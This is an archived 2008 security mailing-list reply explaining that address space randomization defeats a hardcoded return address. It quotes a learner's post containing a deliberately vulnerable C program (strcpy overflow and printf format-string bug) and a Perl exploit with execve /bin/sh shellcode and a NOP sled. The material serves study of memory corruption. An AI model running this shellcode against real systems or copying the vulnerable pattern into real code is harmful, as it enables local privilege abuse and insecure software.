Re: Simple Buffer Overflow

["Ronald van der Westen" <rvdwesten () gmail com>]

Debian 2.6.18 is using Address Space Randomization, this means that
your stack will be at another address every run. It is not possible to
exploit this with a hardcoded return address.


Cheers,
-p

On 10 Jan 2008 02:09:46 -0000,  <loki6 () orange nl> wrote:
> Hi there and thank you for reading this,
>
>
> I'm new in the pen-test area and want to study a simple buffer overflow exploit on debian 2.6.18-5-686.
>
>
> As I've said I'm new to this field and my goal is to be able to anticipate on possible buffer overflow exploits.
>
>
> I've created this simple script: "test.c" :
>
>
> [code]
>
>
> #include <stdio.h>
>
>
> int main(int argc, char **argv){
>
>
>  char buffer[256];
>
>
>  if (argc == 1) {
>
>   printf("Usage: %s (input)", argv[0]);
>
>  }
>
>
>  strcpy(buffer, argv[1]);
>
>  printf(buffer);
>
>
> return 0;
>
> }
>
>
> [/code]
>
>
>
>
> Then I'm trying to exploit it with:
>
>
>
>
>
> [code]
>
>
> #!/usr/bin/perl
>
>
> $ret = "/x90/x9a/xbf";
>
>
> $shellcode = "\xb0\x0b".
>
>        "\x99".
>
>        "\x52".
>
>        "\x68\x2f\x2f\x73\x68".
>
>        "\x68\x2f\x62\x69\x6e".
>
>        "\x89\xe3".
>
>        "\x52".
>
>        "\x53".
>
>        "\x89\xe1".
>
>        "\xcd\x80";
>
>
>
> $exploit = "\x90" x 235;
>
> $exploit .= $shellcode;
>
> $exploit .= $ret;
>
>
> system("./a.out $exploit");
>
>
> [/code]
>
>
>
> The shellcode is an execve /bin/sh.
>
> When I run the perl script it simply returns my bash prompt. So the exploit didn't work.
>
>
> When I type 'exit' afterwards, I'm dropped from my su shell I was in previously, confirming there isn't a "/bin/sh" 
> process.
>
>
> Now the funny thing is when I overflow the buffer of a.out in gdb, with:
>
>
>
>    run `perl -e 'print "A"x262'`
>
> Program received signal SIGSEGV, Segmentation fault
>
> 0x08048412 in main ()
>
>
> It doesn't overflow the EIP, because when I use:
>
>    i r
>
>
> It says:
>
>
> eip    0x8048412     0x8048412  <main+126>
>
>
>
> The first time I tried today it overflowed the EIP correctly and I didn't change anything.
>
>
> ECX is 0x41414141 and
>
> ESP is 0x4141413d
>
> EBP is 0xbf004141
>
>
> Since stack and frame pointer both have 41 in them I figure part of them is overflowed. Why not the Extended 
> Instruction Pointer?
>
>
> I was wondering if someone was able to help me with this, because I really want to get the hang of this.
>
>
> I don't know if I got the NOP sled and return address right either, because when using GDB:
>
>
>
>     x/s $esp
>
>
> I get:
>
>
> 0x4141413d:   <Address 0x4141413d out of bounds
>
>
> I'm kinda stuck from there.
>
>
> My problem in short:
>
>
> - How do I get a reliable return address with GDB
>
> - How do I determine the length of the NOP sled
>
> - How do I test shellcode
>
>
>
> Thanks for reading this..
>
> Thanks for any help, pointers and advice.
>
>
> ironmonkey6
>
> ------------------------------------------------------------------------
> This list is sponsored by: Cenzic
>
> Need to secure your web apps NOW?
> Cenzic finds more, "real" vulnerabilities fast.
> Click to try it, buy it or download a solution FREE today!
>
> http://www.cenzic.com/downloads
> ------------------------------------------------------------------------



-- 
Ronald van der Westen

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------